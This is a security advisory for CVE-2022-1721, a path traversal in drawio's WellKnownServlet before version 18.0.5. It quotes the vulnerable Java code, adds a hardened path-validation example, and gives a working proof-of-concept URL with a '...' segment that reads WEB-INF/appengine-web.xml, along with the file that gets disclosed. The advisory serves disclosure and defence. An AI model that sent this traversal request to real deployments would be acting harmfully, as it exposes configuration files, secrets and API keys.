CVE-2022-1721: Path Traversal in WellKnownServlet in drawio

Path Traversal in WellKnownServlet in GitHub repository jgraph/drawio prior to 18.0.5. Read local files of the web application.


Description

The WellKnownServlet is vulnerable to path traversal, which allows reading local files of the web application. For example, the files under WEB-INF that contain secrets and API keys can be read.

https://github.com/jgraph/drawio/blob/v18.0.4/src/main/java/com/mxgraph/online/WellKnownServlet.java#L40-L66

        String uri = request.getRequestURI().replace("/.", "/");

        if (uri.toLowerCase().contains(".json"))
        {
            response.setContentType("application/json");
        }

        // Serve whatever was requested from .well-known
        try (InputStream in = getServletContext().getResourceAsStream(uri))
        {
            if (in == null)
            {
                response.sendError(404);
                return;
            }
            
            byte[] buffer = new byte[8192];
            int count;

            while ((count = in.read(buffer)) > 0)
            {
                response.getOutputStream().write(buffer, 0, count);
            }
            
            response.getOutputStream().flush();
            response.getOutputStream().close();
        }
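As an added example (not drawio's own code, and not the fix that shipped in 18.0.5), the block below puts the servlet's vulnerable rewrite next to a hardened lookup that canonicalises the request path with java.net.URI, rejects any surviving dot segment, and allow-lists the /.well-known/ prefix before anything is handed to getResourceAsStream(). The class and method names, and the assumption that only content below /.well-known/ should ever be served, are mine.

```java
import java.net.URI;
import java.net.URISyntaxException;

// Added example, not drawio's code: contrasts the vulnerable rewrite in
// WellKnownServlet with a validation step that canonicalises the path and
// confines it to /.well-known/ before any resource lookup happens.
public final class WellKnownPathCheck {
    // Same transformation as the vulnerable servlet: every "/." becomes "/".
    // getRequestURI() is undecoded, so this runs on the raw request path.
    static String vulnerableRewrite(String requestUri) {
        return requestUri.replace("/.", "/");
    }

    // Hardened alternative (assumption: the servlet should only ever serve
    // files below /.well-known/). Returns the canonical path to hand to
    // getResourceAsStream(), or null when the request must be rejected.
    static String safeResourcePath(String requestUri) {
        String path;
        try {
            // normalize() folds "." and ".." segments; getPath() percent-decodes,
            // so encoded dot segments surface here and are caught below.
            path = new URI(requestUri).normalize().getPath();
        } catch (URISyntaxException e) {
            return null;
        }
        if (path == null || path.isEmpty()) return null;
        for (String segment : path.split("/")) {
            if (segment.equals(".") || segment.equals("..")) {
                return null; // a dot segment survived decoding: reject
            }
        }
        // Allow-list the prefix instead of trying to strip dangerous characters.
        if (!path.startsWith("/.well-known/")) {
            return null;
        }
        // The container's private tree must never be reachable, whatever the prefix.
        String upper = path.toUpperCase();
        if (upper.contains("/WEB-INF/") || upper.contains("/META-INF/")) {
            return null;
        }
        return path;
    }

    public static void main(String[] args) {
        String probe = "/.well-known/.../WEB-INF/appengine-web.xml"; // the advisory's PoC path
        System.out.println(vulnerableRewrite(probe));
        System.out.println(safeResourcePath(probe));
        System.out.println(safeResourcePath("/.well-known/security.txt"));
    }
}
```

Running main shows the rewrite turning the advisory's probe into a path with a bare ".." segment, while safeResourcePath rejects it and accepts only a plain /.well-known/ resource.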

Proof of Concept

Access the following URL (replace <host> with the actual host of the web application).

<host>/.well-known/.../WEB-INF/appengine-web.xml

This will disclose the contents of appengine-web.xml:

<?xml version="1.0" encoding="utf-8"?>
<appengine-web-app xmlns="http://appengine.google.com/ns/1.0">

  <threadsafe>true</threadsafe>
  <sessions-enabled>false</sessions-enabled>
  <runtime>java8</runtime>

  <!-- Configure java.util.logging -->
  <system-properties>
    <property name="java.util.logging.config.file" value="WEB-INF/logging.properties"/>
  </system-properties>

  <!-- Path patterns not supported in production -->
  <static-files>
    <include path="/**">
      <http-header name="Referrer-Policy" value="strict-origin"/>
      <http-header name="Access-Control-Allow-Origin" value="*"/>
      <http-header name="X-XSS-Protection" value="1; mode=block"/>
      <http-header name="X-Content-Type-Options" value="nosniff"/>
    </include>
  </static-files>

  <!-- App engine has conflicting interfaces for javax.cache.CacheManager -->
  <class-loader-config>
    <priority-specifier filename="cache-api-1.1.1.jar"/>
  </class-loader-config>
  
  <instance-class>F1</instance-class>
  <automatic-scaling>
    <max-idle-instances>1</max-idle-instances>
  </automatic-scaling>
</appengine-web-app>

Impact

Read local files of the web application.
